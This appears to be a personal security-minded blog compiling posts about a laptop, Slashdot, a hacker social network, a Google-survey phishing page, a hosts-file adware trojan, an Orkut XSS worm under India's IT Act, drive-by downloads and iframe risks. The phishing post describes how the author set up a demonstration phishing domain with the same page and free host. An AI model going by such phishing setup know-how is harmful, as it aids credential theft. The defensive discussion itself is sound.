Bittu’s back :)

Bittu, my wife, got revamped. For unemotional people, it simply means I bought a new laptop 🙂

She is red, and she’s hot!


She’s a Dell XPS M1330. Other features include:

1. Intel Core-2 Duo, 2.1 GHz (My first intel. I used to be with AMD)
2. 200GB HD , 7200rpm
3. 128 MB Nvidia graphics card (the games run awesomely, and I have re-entered the gaming arena. Currently re-re-replaying Serious Sam, Second Encounter)
4. Pre-Loaded Vista 🙁  (I am still a little confused, whether I go ahead with OpenSuse 10.3 or wait 6 more days for OpenSuse 11 to arrive. 😉 )
5. and other regular features like DVD writer, fingerprint scanner, built-in webcam, etc. etc. etc.

I should have updated about her by now, but have been very very busy with an official work involving OpenSocial till yesterday. Hoping to publish other draftified articles soon.

Slashdot, uh! :|

Slashdot is supposed to be a respectable (news) portal for geeks and nerds. It’s punch line says News for nerds, Stuff that matters. I must admit that there was a time when I used to start my day with Slashdot, trying not to miss even a single news. That phase, however, is over. The two biggest problems with Slashdot today are:

1. The Slashdot community, which is getting reduced to people who lurk around to post comic and sarcastic comments. It’s very seldom that you come across an intelligent and insightful comment.
2. The news, if I may say so, itself.


This rant is a direct result of a news titled Google Assists In Arrest Of Indian Man, posted on 19th. First of all this is an Old News. In fact I’d used the context to post a legal analysis of the impact of another Orkut worm, as per my knowledge and belief. I have nothing against reading old news, but for God’s sake, don’t claim it to be new.

Secondly, the post cites Shivaji as a saint. He was not a saint. He was a king and a warrior. Do your homework before posting, or rather approving such news.

Thirdly, the tone in which the post is written is as vague, if not more, as the point the post tries to make. If you wish to blame Google, get proper info before doing that. Google has a pact with Indian law enforcement. They are bound to provide such info. If you wish to convey the news that a false person was convicted, say it. If you wish to bring about the role of Yahoo! and Google in such cases, do it properly.

Being said all that, I don’t think I’ll completely stop reading /. . However, the prestige of being Slashdotted now seems to be just about traffic now.

A new home for us :)


People who know me, know that I desist Social networking portals. Don’t worry, this post isn’t another rant. It’s more of an announcement that I’ve joined a Social Network 🙂

Yup! The guys at GNUCitizen have started a social network for hackers, and very intelligently named it House of Hackers. I’d like to call it HoH (as in Hah!) 🙂

House of Hackers

A few motives cited for creation of the network are:

  • To provide platform for hackers to exchange ideas, communicate, or/and even form groups -elite or otherwise. Although Slackers is an amazing place to communicate, web is never big enough for two similar houses. Moreover, they aren’t same, just similar
  • Create a Hacker recruitment market. Recruiters could advertise to recruit/hire people from here. The best part of this, as cited, would be that HoH would eliminate any middleman (or you employer), and hence help you earn more. Pretty obviously, this holds meaning for elite ones only. But then I have always believe that you can learn only to the extent you can challenge yourself… and good company definitely challenges you 🙂
  • Fund Research programs from time to time. Not so long ago, Ronald came up with idea of Router Hacking Challenge, where you had to hack your own router and make the findings public. The _cutest_ hack would be regarded the best. GNUCitizen (Ronald is now a part of GNUCitizen) hosted the contest. I mention this just to affirm that I really like the guys at GNUCitizen, and I am really excited to know that they’d be encouraging the community (and funding them too). The money is expected to come from the recruitment advertisements.

Needless to summarize that I am keeping my eyes open, fingers crossed and hoping that this turns out to be a great venture for the community.

Just one concern, these %*^*@#$ hackers will keep screwing the portal networking portal, you know. 😉

My profile link.


I have a special likeness for T-Shirt with quotes. More Geeky the quote, more geekier… I mean better.
I got this T-Shirt made for myself a couple of days ago.
I case you didn’t get, it’s a mockery of the crippled iPhone.


Oh by the way, this is my first post on the new blog, and this pic is a response to Swenny’s post on Adding an “i” 🙂

How about a Better & Cheaper MacBook Air!

Those were the days when I used to be a Apple fan.
aah.. the harsh reality that they produce nothing more than crippled products at sky-high prices.

Moreover, Apple isn’t just about cut-throat business. It’s also about making people feel bad about themselves.
Don’t trust me?
See here yourself.

A Phish floating in Google Survey!


1. Phizy-Phizy-Phizy

I have always loved making this phizy-phizy-phizy sound purposelessly, which I once heard in a Rob Schneider movie (which, if I remember correctly, was a pathetic movie). Anyhoo! I, now, have a set of very strong reasons to move around repeating the same lines.
First, we received a request to be involved in a discussion for a Risk Assessment Model for a Banking site. This model had to be focussed on Two Factor Authentication and Phishing. This brainstorming gave me a couple of interesting avenues to work on. Hopefully, I’ll be writing more in this pretty soon.
Secondly, Peter Thomas (one of my amazing Bosses), forwarded me the link about the latest research by Nitesh Dhanjani & Billy Rios. They virtually infiltrated the Phishers ecosystem and have come up with some very interesting information.
Thirdly, my friend Swen called me up to let me know about a phishing mail, claiming to be a Google survey, that had landed in his mailbox. He was excited for two reasons:
a) He had received a phishing mail for the first time, and I guess you all remember the excitement the first time you discovered your first phishing mail.
b) He is one of the Google fans, and is worried about the safety of the vast majority of user-base Google has. Obviously, his concern isn’t without reasons.

2. A Phish named GoogleSurvey

As I mentioned Swen informed me about the shiny phish called GoogleSurvey. It presents you a page that looks completely similar to the Google Login page and requests you to login in order to complete the survey. If you login, you are presented with 3 questions on by one. At the end you are thanked for completing the survey.

3. Anatomy of Google-Survey-Phish gills

The Google Survey Phish isn’t sophisticated y ANY standards. Clearly, it’s done by some n00b, and was probably deployed using a very cheap Phishing Kit. However, it’s really interesting to understand how it works.
The first page the you encounter while analyzing is, which I must admit, looks very similar to the Google Mail login page. A look at the source code reveals that this is not the original page. The google mail look-alike page is alike page is actually located at only frames the page at with 100% width and 0px border.

Another interesting point to note is that the phisher used a free hosting service Thus, theoretically he/she cannot be traced. Not via the hosting service, at least. 🙂

Now, when you enter your id and password, the data is sent to a php script on the server located at Quite obviously, this script stores/mails your credentials for someone who’s not a very pleasing person.

4. Demo: Farming your own Phishes for fun & profit *cough*

The world of Phishing is so dark, deep, safe, easy, and seductive that a person with even a slight malign would be tempted to this farm his/her own phishes and make easy money. I set up my phishing domain for educational purposes. It also shows how quickly you can setup your very own phishing portal, sometimes even without a phishing kit. The domain I’ve setup has the following flaws (introduced to prevent me getting screwed by some half-witted law enforcer) :
1. The domain points at Yahoo!, while the page displayed is similar to the GMail login page.
2. The information entered is NOT stored. You can check it by entering garbage data.

I have used the same page used by the GoogleSurvey Phish, and also used the same free hosting service.

5. Conclusion

It’s almost impossible to prevent users from getting Phished. People will continue to click on links they receive in their inbox and </sarcasm> proceed to win an ipod </sarcasm>. Reducing phishing requires a number of things to be in place -sensible developers, well informed end user, smart browsers with phishing aware features (IE7, Fx2 etc.), a few toolbars like NetCraft to be installed, etc. etc. And even doing all this doesn’t guarantee to save a user ignorant of phshing. I mean how do you save a person who doesn’t even know that such a kind of fraud exists.
Moreover, the URI vulnerabilities have added another dimension to the whole phishing scene. 🙂

Proposal for a new Array Syntax in PHP

PHP LogoA new array syntax has been proposed (for quite some time) for defining arrays in PHP. Currently, we use array() construct to create an array. Some examples could be:

$myArray = array(1, 2, 3, 4, 5);
$yourArray = array(1 => “one”, 2 => “two”, “three”);
$herArray = array(1, 2, 3, array(4 => “four”, “five”));

The proposal is to use square brackets ( [ ] ) to define an array. If passed, we would be able rewrite the above examples as:

$myArray = [1, 2, 3, 4, 5];
$yourArray = [1 => “one”, 2 => “two”, “three”);
$herArray = [1, 2, 3, [4 => “four”, “five”]];

There’s a good deal of discussion going on in the internal mailing list with almost equal number of people voting “for” and “against” it. Rasmus, isn’t not very supportive, yet has voted for the new proposal.

To be pretty honest, I am still not very sure if it’s going to be worth the trade-offs.
Anyhoo! Let’s wait and watch. 🙂

Yahoo!’s javascript based media player!

Yahoo! launched it browser based media player written in javascript. All you have to do is link the javascript code (located at in a web page having links to audio file(s) .

Although it takes a while for the “player” to load completely, yet I am pretty okay with it (for now). Moreover, it’s in beta. I, however, sincerely hope that it doesn’t follow GMail beta path. urghh!

Check back again in a few hours. I’ll posting a demo of the player on my portal. A demo is here. The demo would have This demo has a special meaning for the Indians of my age (or older than) because the songs I’ll be using will be the one we all grew up with, viz. Jungle Book, Mile Sur Mera Tumhara, Baje Sargam, Byomkesh Bakshi, Malgudi Days, Surabhi, Tipu Sultan & Mahbharat. 🙂

Special thanks to Madhav for sharing them.

What a new year Gift! :)

W3AF LogoIt brings me immense pleasure to inform you that w3af (web application attack and audit framework) has been named the Best Application Scanner in BEST IT Security and Auditing Softwares 2007 list prepared by Security Database. 🙂

I had mentioned in a few previous articles that I see immense potential in w3af. I must, however, also admit that I wasn’t hoping something like this to happen so quickly. I am glad I was wrong 🙂

Hoping that more people contribute to the project, and wishing that I get some time to make a few w3af dedicated posts (preferably targeted at developers), at least.

Have a great year ahead.

AdSense exploited by malware (Trojan.Qhost.WU)

1. Life & Code


(The title of this section is taken from Johnny’s blog of the same name, Life and Code. Although my implementation of the phrase isn’t in terms with Johnny’s, yet I could resist using it. 🙂 )

Life: Three days ago I found that there are some strange entries in my local Apache web server logs. Something like: - - [18/Dec/2007:19:39:26 +0530] "GET /iview/msnnkhac001160x600Xdig1600000185msn/direct;wi.160;hi.600/01 HTTP/1.1" 404 352 - - [18/Dec/2007:19:42:19 +0530] "GET /pagead/show_ads.js HTTP/1.1" 404 320

Code: Bitdefender informs of a malware, termed as Trojan.Qhost.WU, is redirecting all the requests made to the Google’s ad server ( by the victims browser to a rougue ad server.

2. Impact of the issue:

Reportedly, a big part of Google’s earnings comes from it’s Ad services. Thus this trojan is not only depriving Google of it’s earning’s, but also the publishers who work hard and hope to make some quick buck for their evening coffee.

3. The enigmatic “hosts” file:

You all know that every system connected directly to the internet is assigned a unique IP address. The domain name (viz. is nothing but a unique name assigned to a unique IP (although more than one domain name can be mapped to an ip address, that is not our concern right now). This mapping is stored in DNS servers. Each time the browser tries to open up a site, a nearby DNS server is queried to find the ip address.
However, before all this, the DNS server of your local system, hosts file, is queried. (Don’t mistake me, this DNS server is just a metaphor 🙂 ). The hosts file stores a domain name to ip address mapping for domains that don’t need a query to DNS server. e.g., localhost is mapped to, the loopback ip, i.e. the ip of local system.
On your windows 2000/NT onwards system, it’s located at %systemroot%\system32\drivers\etc\hosts and on your *nix systems at /etc/hosts. More info on location can be found here.

Now coming back to my problem; unable to find any satisfactory answer, I posted it on Slackers. (Giorgio) Maone, better known as author of the awesome NoScript plugin for Fx, immediately responded, and asked me to check my hosts file.
I had added a number of entries of ad serving sites to point to the local ip in my hosts file and forgotten. I did this to prevent ads from being loaded. Hence, each time any of these sites were called, the hosts file redirected the requests to my local server.
So pretty obviously, I was/am not infected.
“Why do you post the junk about your issue then?”, you ask.
“Because it was a strange coincidence, and because I can, honey :P”

4. How the exploit works?

It’s fairly simple, the malware modifies your hosts file and adds an entry for to prevent DNS lookups and direct all the requests to the malicious server.

5. How do I protect myself?

1. Locate your hosts file and remove any entry for Alternately, you can even modify the entry to point to your local ip, in case you don’t wish to see those ads.
2. Let your Antivirus/AntiSpyware do it for you.

6. Conclusion

What! Dump M$ Windows for Linux. 😛
Seriously, “Linux ain’t easy to use” is a myth. Moreover, if you are into flashy looks, try compiz-beryl package. It IS Awesome… (and consumes amazingly less resources than…uh Vista.)

7. Bonus Tip

In case you wish to prevent your kids, partner, (or even parents) from visiting some sites; or do not wish to see those crappy ads from being loaded, you might consider editing your hosts file. For more information or even sample hosts files, use Yahoo! search.

Orkut Latest XSS Worm; and what it means for Indian Orkuteers

Update: Kishor reports a flaw in the implementation of “private” videos feature on Orkut. Although I am at office and I haven’t checked it yet myself, I believe I can trust him, based on his posts at Slackers. Nice one Kishor. 🙂

1. YAWN [Yet Another Worm, Nanny]

Orkut (Google’s MySpace and Facebook for Indian, Pakistan and Brazil) has been hit by an XSS worm. It’s useless to say but I am not able to resist, so I’ll say it anyways. It’s not the first time that a Social networking site has been attacked by an XSS worm. In fact these sites are the primary target due to a number of reasons -easier gullibility level, exponential reach, huge amount of data waiting to be harvested, web 2.0 etc. etc. etc. There’s good compilation of XSS worms going on at Slackers (Social n/w worm, or no).
Anyhoo. This incident has already been reported by a number of bloggers, so I won’t dive into the technical details. However, this worm seems to be harmless and fixed for now.

2. What it did?

If you viewed a message 2008 vem ai… que ele comece mto bem para vc in your scrapbook, there is a big probability that you’re infected. You were added to a community named Infectados pelo Vírus do Orkut at The worm then forwards itself to the scrapbook of all your contacts (on your behalf). Any doubts on it being exponential?

3. IT Act 2000 [pdf]

IT Act 2000 is India’s legal answer to the miscreants on the technological front. (I realize it’s a pathetic definition, so no flame on it please 🙂 ). The trouble with IT Act 2000 is that the majority of law enforcers aren’t really aware of the real life scenarios. I’ll give a real case to support the point, in a while. Although I am no law expert (just a little bit of interest), I guess I can safely say that the Act needs a few amendments to include/modify a number of issues (e.g., SPAM, etc.)

So what happens when the implementation is in nascent stage, and the enforcers are not completely eductaed?
Things get blown out of proportion. Things get painted in a completely new color. Things get… uh! fill them up yourself.

Chapter 11 of the Act defines the Offences – section 65 to section 78. For now, let’s have a look at Sections 65, and 67.
Section 65: Tampering with computer source documents.

Whoever knowingly or intentionally conceals, destroys or alters or intentionally or knowingly causes another to conceal, destroy or alter any computer source code used for a computer, computer programme, computer system or computer network, when the computer source code is required to be kept or maintained by law for the time being in force, shall be punishable with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.
Explanation: For the purposes of this section, “computer source code” means the listing of programmes, computer commands, design and layout and programme analysis of computer resource in any form.

Section 67:Publishing of information which is obscene in electronic form.

Whoever publishes or transmits or causes to be published in the electronic form, any material which is lascivious or appeals to the prurient interest or if its effect is such as to tend to deprave and corrupt persons who are likely, having regard to all relevant circumstances, to read, see or hear the matter contained or embodied in it, shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to one lakh rupees and in the event of a second or subsequent conviction with imprisonment of either description for a term which may extend to ten years and also with fine which may extend to two lakh rupees.

I have mostly been interested in section 67 (which according to some in the law indsutry) also extends to sms service 🙂

Anyhoo. If you are interested in punishmentsm, here’s the link. Have a look. You might be serving one someday 😉

5. Case Study

There have been quite a few cases revolving around Orkut, but the one that I’ll be talking about (and is the most relevant) is the one where wrong man ( named Lakshmana Kailash K) was put behind bars for 50 freakin’ days. He’s “reportedly” involved in the defamation of Chhatrapati Shivaji, a highly revered historical figure.
In case you aren’t aware, Orkut (Google) has signed a pact with Indian Law Enforcement. They pledge to “block any ‘defamatory or inflammatory content’, or hand over IP address information to police if asked”.

So what happened in the above case?
Law enforcers are reported about the defamation of Shivaji, they contact Orkut, Orkut gives IP, law enforcers run to the ISP (Airtel in this case), Airtel provides address, Guy put in jail.
Simple. Isn’t it?

The only trouble being that Airtel provided the wrong address.
Whoops! And bang! The dude spends 50 days straight, for something he didn’t do.
Neha Viswanathan, a blogger based in UK, has a very nice write-up on the incident. Further, there’s a very nice compilation of some Cyber Crime cases in India at the IndiaCyberLab portal.

6. Putting the pieces of puzzle together

Let’s first collect all the pieces together:
1. Orkut has a pact with Indian law Enforcement.
2. Law enforcers are incompetent *cough*.
3. Orkut (or any other similar site) still has XSS and CSRF flaws in them. Period.
4. XSS and CSRF let you (among other thousand things) manipulate source code (section 65) and/or insert obscene/derogatory (section 67).
5. XSS and CSRF let you post/manipulate data on some other person’s behalf. (Orkut/Samy etc. worms did not require you to click anywhere. Just load the page and the payload in inserted in your friend’s scrapbook on your behalf).

Now combine them all, and you’ll realize that there might be a day when you just sent a “long time no scraps” scrap in your friends scrapbook and went to bed. The next day, a bunch of Cyber officers wake you up, and arrest you for defaming Bala Saheb Thakrey.

…and yes! Don’t talk about Democracy. You’ve already seen that the politicians can get away with a wrestling in parliament arena that will put WWE stars to shame. On the contrary, a chap is detained for 50 days just because the cops thought that they had enough evidence.

7. Conclusion

Stay away from social networking sites. Trust me, they are not worth the price.

Drive-by Download: Where Network Security Meets WebAppSec


This post was due since the Bank of India hack incident, and was fueled by PDP’s Drive-by Java post, which is a very simple, yet a well thought of extension (sort of) to the Drive-by Download attack. This post is aimed to provide a clearer understanding of the Drive-by Download attack (via a demo).

Citing Wikipedia, Any download that happens without knowledge of the user can be referred to as Drive-by Download (DBD). Pretty obviously, an attacker downloads (or uploads, depending on the perspective) malwares, viruses etc., especially in case of a zero-day. Now, I should also specify that by the sub-title “network security meets web application security”, I simply wish to point that viruses, malwares, worms are not really a concern of WebAppSec. Please note that these exclude the Javascript payloads.

Here is the video of Bank of India Hack, showing DBD in action.

Here is my demo of DBD in action.
All files downloaded to your system are 0 (zero) KB and are completely harmless. You’ve my word. 🙂

The Web is Broken

Update: I somehow managed to make a blunder. A part of slide no. 12 was taken from David Kierznowski’s (of GNUCitizen and Blogsecurity group) presentation for OWASP Belgium Conf. I missed out on mentioning David’s name in the credits. Apologies David. I’ve updated and re-uploaded it.

Yesterday, I presented my first Webinar (Seminar on Web). It was titled, The Web is Broken -Why every feature is, in fact, a loophole. A great experience.

Although after listening to my own recording, I felt that a number of things went wrong (mostly because of problems in connectivity and slow internet speed). The issue I was worried about was that it was targeted at developers with beginner to intermediate level knowledge of web, but the topic was very broad. Fortunately, I received some good feedback along with requests to conduct more such sessions. The talk was scheduled for 1.5 hours, but it stretched for 2.5 hours.

Here is the presentation:

I hope you like it too. 🙂

NoScript: For Guaranteed Protection From Evil IFrames

I know, I know… the title sounds like a cheap promotion ad. 😀

As I mentioned in my previous entry that Giorgio has addressed our (mine and Gareth’s) request to block iframes using NoScript. I must, however, admit that I did not expect it to be this fast. NoScript (SilverNight) is here. The changelog has a mention to the thread which I started at Slackers (And our names).

Please note that the mozilla site may not be updated immediately. So, if you are restless soul like me, get it directly from the NoScript site.

Further, I am currently evaluating some security scanners for my company. I am little dis-heartened that there isn’t any amazing scanner available yet. However, I am very hopeful about w3af. I’ve this strong feeling that it has the potential to be the next “Metasploit Framework for www”. Expect an entry on w3af (and may be OWASPs LAPSE plugin).

IFrames – To be or not to be?

Update: Aah. It’s not that there couldn’t have been any better news :P, but today’s News is that Ma1 has agreed to provide feature to block frames through NoScript from the next version (1.1.7). NoScripts Rocks. 🙂
Oh and Yes! Ma1 Rocks too …;)

I have been pretty busy since the last few weeks (and this trend is likely to continue for the coming weeks). Thus, my posts have been more of “news-flashes”. Apologies for that. I’ve now decided to blog about things/technologies I am working on. (Expect some write-ups on security scanners like w3af and code auditing tools like LAPSE.) However, I couldn’t stop myself from putting forward this debate on IFrames. First, let’s see what are the *evil* things that IFrames can do for… *cough*… you

A couple of days ago, Bank of India site was compromised. It was serving malwares to the visitors. This was done by “drive-by downloads“. The criminals were (invisible) IFRAMES.

I hope most of you are aware how dangerous Javascript can be. Of course, I am referring to XSS attacks. However, the recent research, notably from Jeremiah Grossman, RSnake and Gareth Hayes, showed another shockingly dark side of XSS with CSS (yes, Cascading Style Sheets 🙂 ). The criminals here are IFrames, visited attribute, etc.

Gareth also gave a proof of concept on his blog to perform CSRF using CSS, even when Javascript is disabled. He (very wisely) used CSS to change the LOOK and FEEL of a Submit button to a link. Now, when a *smart* user is surfing the web with javascript disabled, he’d not worry about clicking a link, and may end up clicking on the *link* to submit the form.

You decide… :).
I have anyways left some other known issues, I think.

Gareth has been preaching the evil nature of IFrames for quite some time now. Yesterday, he made a new entry titled “IFRAMES ARE EVIL” on his blog. He suggested using some attributes/tags to disable/enable iframes etc. Iframes have been on my mind for quite some time. I believe that Content Restriction, once introduced, can solve a number of issues. Till then, I believe, Maone’s NoScript can come to the rescue by proving optional feature to disable iframes. I know, this is definitely not a attractive suggestion, but who knew we’d have to browse with Javascript disabled!

Moreover, I thought it’d be a good opportunity to see what other researchers have to say about it. So, I posted it to the Slackers forum. I am watching keenly. 🙂

M$ WindowsXP just got a newer version of Update with new Components!

I am not sure if anyone is aware of it or not, so kindly spare me if it’s not NEW in the sense I wish to convey. (Or may b, you didn’t discover it the way I did) 😛
For no particular reason, I visited the windows update page today (using IE7) and got this message:


As you can see, the *latest version* of Windows Update requires a few components to be installed on your system. There’re also some details regarding the components, which are hidden using a javascript function.

I’d encourage you to read all the benefits that are provided by the latest version. Once you are done reading them (and figuring which of them are new and which makes sense), proceed to discover the *special component*.